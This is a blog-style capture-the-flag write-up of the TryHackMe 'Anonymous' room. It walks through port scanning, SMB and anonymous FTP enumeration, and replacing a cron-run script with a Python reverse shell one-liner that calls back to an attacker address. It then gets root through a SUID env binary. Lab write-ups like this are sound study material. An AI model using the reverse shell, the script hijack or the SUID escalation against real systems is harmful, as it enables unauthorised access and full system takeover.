Anonymous Tryhackme Writeup

Thatquietkid
3 min readJan 24, 2021

Anonymous link:https://tryhackme.com/room/anonymous

Let’s start with nmap scan as usual.

Command: nmap -A -T4 -p- IP

here -A means aggressive scan (scans everything like host name , version detection, os and all but it is a bit loud but as we are doing this for practice and on tryhackme , we shouldn’t focus on that).

  • T4 is the speed ( you can set any T1,T2,T3,T4,T5 .T1 is the slowest and T5 is the fastest)
  • -p- means scanning all 65535 ports.

The map result shows that 4 ports are open.

When I saw smb i thought maybe it is also like legacy box of Hackthebox and we may found a metasploit module for it .But I was wrong , couldn’t find a single exploit for this version of samba

Now I thought let’s see the shares of smb .

Command smbclient -L \\\\IP\\

and there was a share (pics) there.So I thought let’s see that.

It had 2 pictures ,so I thought let’s download that and see what it has(steganography i thought) .But it was also nothing as there were 2 images of dogs and nothing else.

Now, I realized that ftp anonymous login is enabled.

Let’s ftp to the machine

Command : ftp IP

It had a folder called scripts and inside that there where 3 files and I downloaded all of them.

  1. to_do.txt

2.removed_files.log

3. clean.sh

It looks like a cron job that runs andprints “Running cleanup script: nothing to delete” and appends it to removed_files.log .

Now we can edit this and make it into a reverse shell and upload it on ftp .

Reverse shell:python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.0.0.1”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

Remember to change ur IP and port on which you listen on ur machine.

I uploaded clean.sh (after modifying it with a reverse shell) .

Command : put clean.sh

Now , we get a reverse shell back on our machine and we are user (namelessone).

Now , we can read user flag.

Now , the last part , the privilege escalation part .

For that I ran command: find / -perm -u=s -type f 2>/dev/null.

It’s for finding suid files .

and I found /usr/sbin/env and as usual I searched for this on gtfobins

Link:https://gtfobins.github.io/gtfobins/env/#suid

Command : /usr/sbin/env /bin/sh -p

and now I m root and I can read the root flag.

Now we have rooted this box and read all the flags .

Thanks for reading my writeup and have a nice day .

--

--